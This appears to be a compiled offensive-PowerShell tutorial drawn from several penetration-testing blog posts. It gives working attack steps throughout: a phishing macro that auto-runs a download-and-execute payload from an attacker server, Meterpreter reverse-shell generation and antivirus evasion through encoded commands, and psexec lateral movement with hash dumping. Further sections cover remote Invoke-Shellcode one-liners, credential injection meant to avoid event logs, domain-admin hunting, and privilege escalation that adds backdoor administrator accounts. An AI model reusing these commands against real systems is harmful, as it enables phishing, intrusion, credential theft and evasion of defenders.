I have seen quite a few tweets/comments/etc about using Powershell's functionality within the context of a Microsoft Office document/VBA (https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode). I am going to share a way I have been leveraging Powershell for payload delivery during phishing engagements for a while now to achieve the same end result in a much simpler fashion. The two stages are as follows:
800
801
Attacker Machine:
802
msf > use exploit/windows/misc/psh_web_delivery
803
msf exploit(psh_web_delivery) > set SRVHOST Strategic-Sec-Ubuntu-VM-IP
804
msf exploit(psh_web_delivery) > set URIPATH boom
805
msf exploit(psh_web_delivery) > exploit
806
807
VBA Macro:
808
Sub AutoOpen()
809
810
    Call Shell("powershell.exe -w hidden -nop -ep bypass -c ""IEX ((new-object net.webclient).downloadstring('http://Strategic-Sec-Ubuntu-VM-IP:8080/boom'))""", 1)
811
End Sub
812
813
Save the document as a macro-enabled file.
814
Send to target, and upon opening....
815
816
817
818
819
820
821
Meanwhile back at the bat cave...
822
823
824
825
826
827
828
829
#####################################
830
#Bypassing Antivirus with PowerShell#
831
#####################################
832
833
Reference:
834
https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell
835
836
On a recent penetration test, I ran into a number of challenges overcoming antivirus on compromised machines. Although I had already obtained domain administrator credentials, a number of roadblocks existed that prevented me from traversing the internal network:
837
838
Remote Desktop was disabled on roughly 75% of the Windows servers. Although I had a clear-text password, I could not leverage RDP to interact with the systems.
839
Antivirus was preventing all of my commonly used payloads from executing. Including all my attempts at using Metasploit's meterpreter, shell, upexec, exec, etc. modules. Manual encoding of custom PE files also failed to bypass AV.
840
To fully leverage the domain admin credentials, I needed a reliable method to access all the Windows servers on the network without interference from Antivirus. Without RDP, I needed to accomplish this through SMB.
841
842
The solution I present below accomplishes this task by utilizing SysInternals psexec to gain a remote command prompt on the victim. Utilizing this command prompt, I then execute a set of PowerShell commands to upgrade my access to a Meterpreter shell all the while staying hidden from Antivirus. The techniques presented here, while not likely to be bleeding edge, attempt to consolidate a number of disjoint topics into a useful penetration testing scenario.
843
844
Challenge
845
846
There are a number of challenges that need to be overcome. Of course, evading antivirus is the ultimate challenge. However, limitations in the number of characters that can be passed via the Windows command prompt presents another challenge that needs to be considered. Additionally, PowerShell may limit a user's ability to execute scripts via its Execution Policy. Although this can be changed, I generally prefer to avoid altering the target machine.
847
848
Here's how I'll be overcoming these challenges:
849
850
Evading Antivirus: Execute the Meterpreter shellcode in memory to avoid AV signature detection
851
Execution Policy Preventing the Execution of PowerShell Scripts: Execute the commands via the -command and -encodedCommand PowerShell switches
852
Limitations on Windows Command Length: I'll split the commands up into multiple steps and, where needed, execute them using a PowerShell variable which does not have the same size restriction
853
Overview
854
855
The process, as I executed it, loosely adheres to the following steps:
856
857
Generate the Meterpreter payload, encode it, and save it within an accessible location on the attacking machine (e.g. Apache's /var/www directory).
858
Start a Meterpreter listener on the attacking machine
859
Utilize SysInternals psexec to obtain a command prompt on the target machine
860
From the command prompt, execute a PowerShell command to download the payload generated in step one.
861
From the command prompt, execute another PowerShell command which reads in our payload and executes the encoded version of it.
862
The Setup
863
864
In my scenario, there are 3 machines in play:
865
866
The Windows target - 192.168.3.93
867
The attacker's Strategicsec Ubuntu machine - Strategic-Sec-Ubuntu-VM-IP
868
The attacker's Windows machine (used for running psexec standalone). Running as a VM - IP address is inconsequential.
869
The Preparation
870
871
Let's get started. Let's start by generating a PowerShell script which executes our Meterpreter payload. This is simple by using msfpayload and msfencode:
872
873
msfpayload windows/meterpreter/reverse_tcp LHOST=Strategic-Sec-Ubuntu-VM-IP LPORT=443 R | msfencode -t psh -a x86
874
875
While it's fresh on our minds, start the multi/handler in Metasploit to listen on Strategic-Sec-Ubuntu-VM-IP:443.
876
877
Although there's likely a quicker way to do the next steps, I chose to utilize my Windows VM. Start by copying the PSH script that was output above. In a Windows command prompt, perform the following:
878
879
c:\> powershell
880
881
PS c:\> $cmd = '<PASTE THE CONTENTS OF THE PSH SCRIPT HERE>'
882
883
PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
884
885
PS c:\> $e = [Convert]::ToBase64String($u)
886
887
PS c:\> $e
888
889
The above converts our script to Unicode and then Base64 encodes it. A couple of notes... Replace everything in red above (including the '<' and '>' characters) with the script generated by msfpayload/msfencode. This will be a multiline command. Ensure the single quotes are present. You may have to press "Enter" a few times after typing the closing single quote.
890
891
The last line in the PowerShell series simply prints the encoded payload to the screen. Copy this value and clean it up by removing all new lines. Your encoded data must not span multiple lines.
892
893
Save the cleaned up, encoded payload on the attacking machine under a directory served by Apache (or whatever web server you prefer). In my case, I'll save it as "shell.txt" in /var/www. Start your web server and verify that the file is accessible.
894
895
The Execution
896
897
On your Windows machine, lets get a remote command prompt on the target (this assumes that you have valid credentials on the target).
898
899
c:\> psexec \\10.1.1.10 -u domain\jdoe -p s3cr3t cmd.exe
900
901
With all the setup in place, we'll now proceed to download our encoded payload and execute it.
902
903
In the command prompt we just obtained, enter the following to download our encoded payload:
904
905
c:\> powershell -noprofile -noninteractive -command "& {$client=new-object System.Net.WebClient;$client.DownloadFile('http://10.1.1.20/shell.txt','c:\windows\temp\_shell.txt')}"
906
907
For those of you familiar with WGET, the above basically duplicates that functionality. It downloads the file "shell.txt" from http://10.1.1.20 (our attacking machine with the web server running) and saves it to c:\windows\temp\_shell.txt on the target server.
908
909
Now that we have the encoded shellcode on the target machine, we can execute the following from the same command prompt.
910
911
c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd=type 'c:\windows\temp\_shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"
912
913
While there are likely more efficient ways to accomplish this command, what it's doing is grabbing the contents of our encoded shellcode and storing it in a variable (via the 'type' command). It then executes an additional PowerShell command. By using the -encodedCommand switch we can pass it our encoded shellcode. This allows us to execute the script via a command line rather than a script (which avoids any ExecutionPolicy restrictions). Additionally, storing the payload in the $cmd variable allows us to bypass command length restrictions of the command prompt.
914
915
Success
916
917
Depending on your connection speed, the above command may take some time to execute. When it's complete, we are greeted with the sweet site of a new Meterpreter session untouched by AV...
918
919
[*] Sending stage (752128 bytes) to 10.1.1.10
920
[*] Meterpreter session 3 opened (10.1.1.20:443 -> 10.1.1.10:2214) at 2012-08-21 09:06:50 -0400
921
922
meterpreter > getuid
923
Server username: domain\jdoe
924
meterpreter > sysinfo
925
Computer : VICTIMSVR
926
OS : Windows .NET Server (Build 3790, Service Pack 2).
927
Architecture : x86
928
System Language : en_US
929
Meterpreter : x86/win32
930
meterpreter > hashdump
931
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d<snip>3:::
932
jdoe:500:aad3b435b51404eeaad3b435b51404ee:d<snip>3:::
933
934
935
936
937
938
939
#########################################################
940
#Authenticated Metasploit Payloads via Powershell Psexec#
941
#########################################################
942
943
Reference:
944
http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html
945
946
I love powershell and in a windows environment, powershell is king. Add the ability to perform native code injection and sprinkle in some metasploit and the possibilities are endless. There is a really awesome collection of tools called Powersploit by @mattifestation . These are powershell scripts that take advantage of "features" of powershell to do some cool stuff.
947
948
@obscuresec is also a contributor to the powersploit project, and not too long ago he had a really cool blog post detailing one way to execute a meterpreter payload within a powershell process. I thought this idea was really cool so I decided to try and take a stab at writing a metasploit module that implements a slightly modified version of this technique.
949
950
Many times in a penetration test I find myself having valid credentials to a target machine, but my payload keeps getting busted when I try and upgrade my shell to meterpreter.
951
952
This module allows you to use metasploit's existing powershell encoded payloads, or you can specify a file to use that contains a powershell script (such as powersploit) that will be executed on the target machine within the powershell process using the LPATH variable.
953
954
At the very minimum, will need to set the LHOST, RHOST, ARCH, SMBUSER and SMBPASS variables.
955
956
And if all goes as planned...
957
958
Also we can see that the only thing spawned on the target machine is one powershell process:
959
960
You can find the module on github https://github.com/jakxx/metasploit-framework/blob/powershell_psexec/modules/exploits/windows/powershell/powershell_psexec.rb.
961
962
963
################################################
964
#PowerSploit: The Easiest Shell You’ll Ever Get#
965
################################################
966
967
Reference:
968
https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
969
970
Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.
971
972
PowerSploit  is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET  so you may already be using it!  Many of the scripts in the project are extremely useful in post-exploitation in Windows environments.  The project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode.
973
974
975
In order for this to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let’s automated it with a really simple Python script:
976
977
script PowerSploit: The Easiest Shell Youll Ever Get
978
979
To start the multi/handler and configure it, we just run the script:
980
981
python StartListener.py 192.168.0.15 443
982
983
Now that our handler is ready, we can move on to executing our shell.  The first thing I did to make the next step easier to type is shorten the github link to Invoke-Shellcode with bitly:
984
985
bitly PowerSploit: The Easiest Shell Youll Ever Get
986
987
Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the function and pass it to Invoke-Expression to put it into memory:
988
989
IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’)
990
991
Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:
992
993
Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.0.15 –Lport 443 –Force
994
995
We can actually combine these commands to run a single command to execute our shell:
996
997
IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 172.0.1.200 –Lport 443 –Force
998
999
powershell PowerSploit: The Easiest Shell Youll Ever Get
1000
1001
Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:
1002
1003
meterpreter PowerSploit: The Easiest Shell Youll Ever Get
1004
1005
That is the easiest and most convenient AV-bypass I have ever seen!  Just open PowerShell and type a command.  Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier.  You can find more ways at my  blog and by following me on twitter.  Also, join me at Derbycon when I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall and how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber.  I hope to see you all there!
1006
1007
1008
1009
1010
#############################################
1011
#Injecting Logon Credentials With PowerShell#
1012
#############################################
1013
1014
Reference:
1015
http://clymb3r.wordpress.com/2013/11/17/injecting-logon-credentials-with-powershell/
1016
1017
In this article I will introduce a new script, Inject-LogonCredentials, that uses PowerShell (specifically, the Invoke-ReflectivePEInjection script) to inject credentials in memory.
1018
1019
I’ll start with a brief review of the current commonly used methods of using stolen credentials.
1020
1021
Doing a RunAs with a users credential. The downside of a RunAs is that it creates an “Explicit Credential Logon” event in the Windows event logs (event id 4648). As you can see in the picture below, this event shows the account being logged in with (testuser), and the account initiating the new logon (joe). It also shows the process that called the logon API. Incident responders commonly look for this event as an indicator of lateral movement, so it should be avoided.
1022
Injecting credentials directly in to LSASS. This technique, used by Windows Credential Editor, involves injecting a DLL in to LSASS and modifying its memory to add your credentials. Unfortunately, if LSASS is set to be a protected process in Windows 8.1 this technique fails because only specially signed processes can manipulate protected processes. While it is true that tools such as Mimikatz can disable protected processes, I do not want to load a kernel driver (which is what Mimikatz does) every time I pivot.
1023
Implementing your own authentication protocols. Examples include the NTLM module in Metasploit, which can perform NTLM authentication without relying on Windows authentication. This has the benefit of staying out of the logs (since it does not rely on Windows authentication libraries). Unfortunately it limits you to using Metasploit modules that use the Metasploit NTLM module. This module only supports NTLM, and not Kerberos. One new feature of Windows 8.1 allows user accounts to be banned from using NTLM, which will prevent this module from functioning.
1024
As noted, doing a RunAs throws a suspicious event log because it allows an incident responder to see that some random user is logging in with domain admin credentials (or other privileged credentials). Instead of simply doing a RunAs, I will do the following:
1025
1026
Create a DLL that:
1027
Opens a named pipe and reads a domain/username/password combination.
1028
Read a logon type from the named pipe (current supported types are Interactive, RemoteInteractive, and NetworkCleartext).
1029
Calls LsaLogonUser to create a logon with the credentials it was supplied, and as the logon type supplied.
1030
Impersonates the token returned by LsaLogonUser with its current thread, which allows the token to be kidnapped by Invoke-TokenManipulation.
1031
Reflectively inject this DLL in to winlogon.exe using Invoke-ReflectivePEInjection.
1032
Supply the DLL with the username/password to create a logon for by using a named pipe.
1033
Call LsaLogonUser with the supplied credentials and logon type within winlogon.exe.
1034
The differences between this script and a normal RunAs are:
1035
1036
Process calling the logon API will show up as Winlogon.exe.
1037
User initiating the logon is SYSTEM, not a random user account.
1038
You can specify the logon type. For example, you can make LSASS think the account is connecting via RDP, which might be normal. You can also make LSASS think the account is a local logon (someone physically using the computer).
1039
1040
RunAs 4648 Event Log
1041
RunAs 4648 Event Log
1042
1043
4648 Event Log With Inject-LogonCredentials
1044
4648 Event Log With Inject-LogonCredentials
1045
1046
4624 With Inject-LogonCredentials
1047
4624 With Inject-LogonCredentials
1048
1049
As you can see, everything that was suspicious in the 4648 event log is gone. But how do you use these credentials now that they are in memory?
1050
1051
Once you run the script, you can use Invoke-TokenManipulation (or incognito if you are using Metasploit) to kidnap the token of the new logon. You can use this impersonated token to pivot off box using things such as SMB, WMI, and PowerShell remoting.
1052
1053
Here’s an example:
1054
1055
Inject-LogonCredentials –DomainName demo –UserName administrator –Password Password1 –ExistingWinLogon
1056
Invoke-TokenManipulation –CreateProcess “c:\windows\system32\windowspowershell\v1.0\powershell.exe” -UserName “demo\administrator”
1057
1058
It’s worth mentioning that the script currently has two modes:
1059
1060
ExistingWinLogon: Injects the DLL in to an already running winlogon process. The DLL will never be unloaded from this process so there is forensic evidence that is left behind if someone does analysis on the winlogon process.
1061
NewWinLogon: Creates a new winlogon process, running as SYSTEM, using token kidnapping. Injects the logon DLL in to this new winlogon process. Once you are done, you can kill the process. This allows you to delete the process and wipe away DLL injection evidence, but Windows will log that PowerShell.exe created winlogon, which would look strange if anyone notices.
1062
Hopefully this has helped illustrate how Invoke-ReflectivePEInjection can be used to do awesome things.You can find the script at: 
1063
https://github.com/clymb3r/PowerShell/tree/master/Inject-LogonCredentials
1064
1065
As usual, it will also be added to PowerSploit.
1066
1067
###############################
1068
#Veil-PowerView: A Usage Guide#
1069
###############################
1070
1071
Reference:
1072
http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
1073
1074
[Note: this topic was cross-posted on the Veil-Framework site (https://www.veil-framework.com/veil-powerview-usage-guide/)]
1075
1076
Veil-PowerView (https://www.veil-framework.com/veil-powerview/)is a project that was originally prompted by a client who locked down their corporate machines by disabling all “net *” commands for normal users. While building pure Powershell replacements to easily bypass this protection, I began to explore what else could be done with Powershell from a domain and network situational awareness perspective. Being inspired by my boss @davidpmcguire, and drawing on existing work from @mubix, the offensive Powershell community (@obscuresec, @mattifestation, and DarkOperator), and the authors of various Metasploit modules like local_admin_search_enum, I began to build more interesting functionality to abuse Windows domains. Now that Veil-PowerView has been tested in multiple, diverse environments and has started to mature a bit, I wanted to put together a quick guide on using some of PowerView’s interesting functionality.
1077
1078
First, some basic usage: to get the most out of PowerView, you need a current Windows workstation with domain credentials. The credentials don’t need to be privileged, as many of the API methods abused by the tool only need basic user access. To load up PowerView, first download the raw powerview.ps1 (https://raw.githubusercontent.com/Veil-Framework/Veil-PowerView/master/powerview.ps1) script to a local location, and then launch Powershell:
1079
1080
C:> powershell.exe -nop -exec bypass
1081
Then import the PowerView module with the following:
1082
1083
PS C:\> Import-Module [full path to powerview.ps1]
1084
All of the PowerView cmdlets will now be exposed and tab completable (Invoke-[tab]). To get more information on any command, use get-help [cmdlet], with an optional -full flag to return complete information. I.E. “Get-Help Invoke-Netview -full“. To get a list of all the available functions, check the README.md. Arguments/flags for each cmdles should be tab completable, with something like “Invoke-Netview -[tab]“. If you want to output your results to a file, I recommend using the Powershell Out-File cmdlet, I.E. ​”PS C:\> Invoke-Netview | Out-File -Encoding ASCII output.txt” (the -encoding flag is used since since Powershell defaults to Unicode). If you want detailed output for any of the PowerView commands, just add a “-Debug” flag, and if you want status output for any functions that enumerate multiple machines use “-Verbose”.
1085
1086
Now, on to the fun stuff. PowerView provides replaces for almost all Windows net commands, letting you query users, machines, domain controllers, user descriptions, share, sessions, and more. The Get-Net* cmdlets should cover most of your needs. For example, the Get-NetComputers cmdlet will let you search for all systems in the domain, and you can provide wildcard searches for the -HostName, -OperatingSystem, and -ServicePack. If you want to use this find all Windows XP boxes on the domain, run:
1087
1088
PS C:\> Get-NetComputers -OperatingSystem *xp*
1089
Since we can search for operating systems and service packs, let’s take this one step further. How about finding all machines likely vulnerable to MS08-067, ping them and return any hosts that are up? There’s a function for that:
1090
1091
PS C:\> Invoke-FindVulnSystems -Ping
1092
One of the common things we do on assessments is check for overly permissive file shares that our current user can read. This used to be a pretty manual process, but now we can automate it easily. The following command will query AD for machines using Get-NetComputers, ping each machine to ensure it’s up and responsive, get a list of available shares for each machine using Get-NetShare, exclude PRINT$ and IPC$ from the output, and check if the current user has read access:
1093
1094
PS C:\> Invoke-ShareFinder -Ping -ExcludePrint -ExcludeIPC -CheckShareAccess 
1095
Invoke-Netview is a port of Rob Fullers’s netview.exe tool. It uses native Windows API commands to get the sessions, shares, and loggedon users for target machines, often without needing administrative credentials. The following command will query AD for machines using Get-NetComputers, ping each machine to ensure it’s up and responsive, and wait for a delay of 10 seconds between touching each machine:
1096
1097
PS C:\> Invoke-Netview -Ping -ExcludeShares -Delay 10
1098
A really useful thing on an assessment is to know where particular users are logged in. Say you compromise a user that has administrative access to local desktops on a domain. You can use functionality in PowerView to find where high value users (default “Domain Admins”) are logged in, and can even check if you have local admin on the found machines! The following command will query AD for machines using Get-NetComputers, ping each machine to ensure it’s up and responsive, query AD for members of the “Domain Admins” group, and then check if any users currently logged in/have a sessions on a machine match the target user list. Locations where Domain Admins are located are then displayed:
1099
1100
PS C:\> Invoke-Userhunter -Ping
1101
If you want to hunt for a specific user or userlist, or use a pre-populated host list instead of querying AD, there are flags for those actions as well:
1102
1103
PS C:\> Invoke-UserHunter -UserName “jsmith” -HostList hosts.txt
1104
An even stealthier way to find where target users are located is to find all the file servers mounted by users from their homeDirectory fields, and run a Get-NetSessions command on the found file servers. This will give you a large amount of information on most corporate networks with a minimal amount of traffic! Invoke-StealthUserHunter can automate all of this for you nicely:
1105
1106
PS C:\> Invoke-StealthUserhunter -GroupName “Server Admins”
1107
There are plenty of more functions and options in Veil-PowerView than what we covered here: I encourage you to check out PowerView’s README.md as well as the descriptive comments for each cmdlet in the source which detail use cases, arguments and outputs for each function.
1108
1109
If you need to invoke PowerView in a non-interactive context, there are a few additional launching options. If you know the function and arguments you want to run (like Invoke-Netview) you can append the function name to the end of the PowerView file and run it with:
1110
1111
C:\> powershell.exe -nop -exec bypass .\powerview.ps1​ > output.txt
1112
You can also run it straight without any script modifications with:
1113
1114
C:\> powershell.exe -exec bypass -Command “& {Import-Module .\powerview.ps1; Invoke-Netview | Out-File -Encoding ascii output.txt}”
1115
If you want to invoke everything without touching disk, use something like this:
1116
1117
C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mYPUO4′); Invoke-NetView -Ping | Out-File -Encoding ascii netview.txt“
1118
There’s also a Metasploit module for running powershell commands through a session, post/windows/manage/powershell/exec_powershell. Before you use this module, first append the desired function and any arguments (i.e. “Invoke-StealthUserHunter”) to the end of powerview.ps1 on your attacker machine, and then specify the local path to the script in the module options. Metasploit will upload the script, run it on the target, retrieve the results and save them back to your local machine.
1119
1120
If you have any questions on PowerView, hit me up at will [at] harmj0y.net, on twitter at @harmj0y, Freednode (harmj0y in #veil or #armitage), submit an issue on the official Github page, or come check out the Veil-Framework at BlackHat Arsenal.
1121
1122
1123
1124
########################
1125
#PowerUp: A Usage Guide#
1126
########################
1127
1128
Reference:
1129
http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
1130
1131
Note: this topic was cross-posted on the official Veris Group blog (http://www.verisgroup.com/2014/06/17/powerup-usage/).
1132
1133
PowerUp (http://www.harmj0y.net/blog/powershell/powerup/) is the result of wanting a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks, .dll hijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system. We’ve gotten the chance to test PowerUp in multiple environments, as well integrate public feedback, so I wanted to put together a quick usage guide for those wanting to check it out.
1134
1135
To load up PowerUp, first download the raw script (https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1) to a local location, and then launch Powershell:
1136
1137
1138
1139
C:> powershell.exe -nop -exec bypass
1140
Then import the PowerUp module with the following:
1141
1142
PS C:\> Import-Module .\PowerUp.ps1
1143
All of the PowerUp cmdlets will now be exposed and tab completable (Get-[tab]). To get more information on any command, use get-help [cmdlet], with an optional -full flag to return complete information. I.E. “Get-Help Get-ServiceEXEPerms -full“. To get a list of all the available functions, check the README.md (https://github.com/HarmJ0y/PowerUp/blob/master/README.md). If you want to output your results to a file, I recommend using the Powershell Out-File cmdlet, I.E. ​”PS C:\> Get-ServicePerms | Out-File -Encoding ASCII checks.txt” (the -encoding flag is used since since Powershell defaults to Unicode).
1144
1145
The most common way I end up using PowerUp is by using the Invoke-AllChecks function, which runs through all relevant checks for the machine and outputs a status report:
1146
1147
PS C:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
1148
Sidenote: there are a few other ways you can run the Invoke-AllChecks functionality in the field, particularly over a Meterpreter (or Beacon) agent. One option is to upload the PowerUp.ps1 script to the machine, drop into a shell, and execute the following command:
1149
1150
C:\> powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”
1151
If you want to invoke everything without touching disk, use something like this:
1152
1153
C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks”
1154
There’s also a Metasploit module for running powershell commands through a session, post/windows/manage/powershell/exec_powershell. Before you use this module, first append “Invoke-AllChecks” to the end of PowerUp.ps1 on your attacker machine, and then specify the local path to the script in the module options. Metasploit will upload the script, run it on the target, retrieve the results and save them back to your local machine.
1155
1156
Now, let’s take a look at that example report:
1157
1158
Running Invoke-AllChecks
1159
Checking for unquoted service paths...
1160
[+] Unquoted service path: CustomSVC - C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe
1161
Checking service executable permissions...
1162
[+] Vulnerable service executable: CustomSVC - C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe
1163
Checking service permissions...
1164
[+] Vulnerable service: CustomAPP - C:\Custom\deploy.exe
1165
Checking for unattended install files...
1166
[+] Unattended install file: C:\Windows\Panther\Unattended.xml
1167
Checking %PATH% for potentially hijackable service .dll locations...
1168
Checking for AlwaysInstallElevated registry key...
1169
[+] AlwaysInstallElevated is enabled for this machine!
1170
Checking for Autologon credentials in registry...
1171
We definitely have some interesting output to check out here. The first thing I could check out is the unattended installation file at C:\Windows\Panther\Unattended.xml- this file might have a base64-encoded deployment password that would give us a quick win.
1172
1173
The next up is the vulnerable service executable. This misconfiguration happens when the executable associated with a service has improper permissions, allowing other users to write to the .exe. Since these services run as SYSTEM, if we replace the exe with our own, we can escalate quickly. PowerUp includes a function to easily back up the service .exe and write out a patched C# service to that service location. If it succeeds, it returns True, and returns False if it fails. We can use the -Verbose flag to get some more information:
1174
1175
PS C:\> Write-ServiceEXE -ServiceName CustomSVC -UserName backdoor -Password password123 -Verbose
1176
VERBOSE: Backing up ‘C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe’ to ‘C:\Users\adam\Documents\Visual Studio
1177
2008\Projects\Service\Service\bin\Release\service.exe.bak’
1178
VERBOSE: Service binary written out to ‘C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe’
1179
True
1180
This new service binary will create a new user named backdoor, and add them to the local administrators. If we can’t start/stop the service, rebooting the box should do the trick to get the user added. After the user is added, running Restore-ServiceEXE -ServiceName CustomSVC should place the original binary back in its proper place.
1181
1182
Sometimes services themselves are vulnerable- if we can modify a service and start/stop it, we can change the path name to the service exe to be something like “net user backdoor2 /add”. If we start/stop the service and then repeat that process to add the user to the local administrators, we’re golden:
1183
1184
PS C:\> Invoke-ServiceUserAdd -ServiceName CustomAPP -UserName backdoor2 -Password password123 -Verbose
1185
VERBOSE: Service ‘CustomAPP’ original path: ‘C:\Custom\deploy.exe’
1186
VERBOSE: Service ‘CustomAPP’ original state: ‘Stopped’
1187
VERBOSE: Adding user ‘backdoor2′
1188
VERBOSE: Adding user ‘backdoor2′ to group ‘Administrators’
1189
VERBOSE: Restoring original path to service ‘CustomAPP’
1190
VERBOSE: Leaving service ‘CustomAPP’ in stopped state
1191
True
1192
Finally, let’s check out that AlwaysInstallElevated key. This is a key sometimes set by enterprises in an attempt to simply the deployment of installer packages without granting users administrative rights. However, setting this key actually is the exact same as giving users those rights, as writing out a custom .msi installer and running it will give the user elevated privileges:
1193
1194
PS C:\> Write-UserAddMSI
1195
Service binary written out to ‘UserAdd.msi’
1196
True
1197
When we run this .msi, it gives us a gui to add a local admin:
1198
1199
UserADD.msi
1200
1201
1202
#######################################
1203
#Cannot be reproduce everything below #
1204
#######################################
1205
1206
http://ezine.echo.or.id/issue28/005.txt 
1207
http://trwagner1.wordpress.com/2012/01/03/powershell-and-wireshark/
1208
https://www.fishnetsecurity.com/6labs/blog/cryptolocker-prevention-and-remediation-techniques
1209
1210
#############
1211
# SharpPcap #
1212
#############
1213
1214
Reference:
1215
http://poshcode.org/5374
1216
1217
SharpPcap is a cross-platform packet capture framework for the .NET environment, based on the famous pcap / WinPcap libraries. It provides an API for capturing, injecting, analyzing and building packets using any .NET language such as C# and VB.NET.
1218
1219
# First, you have to install WinPcap
1220
# http://www.winpcap.org/install/default.htm
1221
1222
# Then, you have to download SharpPcap
1223
# http://sourceforge.net/projects/sharppcap/
1224
1225
# And you need to import the assembly from wherever you put it
1226
Add-Type -Path C:\ps\SharpPcap-4.2.0.bin\SharpPcap-4.2.0\Release\SharpPcap.dll
1227
1228
http://poshcode.org/get/5374
1229
1230
(new-object System.Net.WebClient).DownloadFile("http://poshcode.org/get/5374", "c:\ps\SharpPcap.ps1")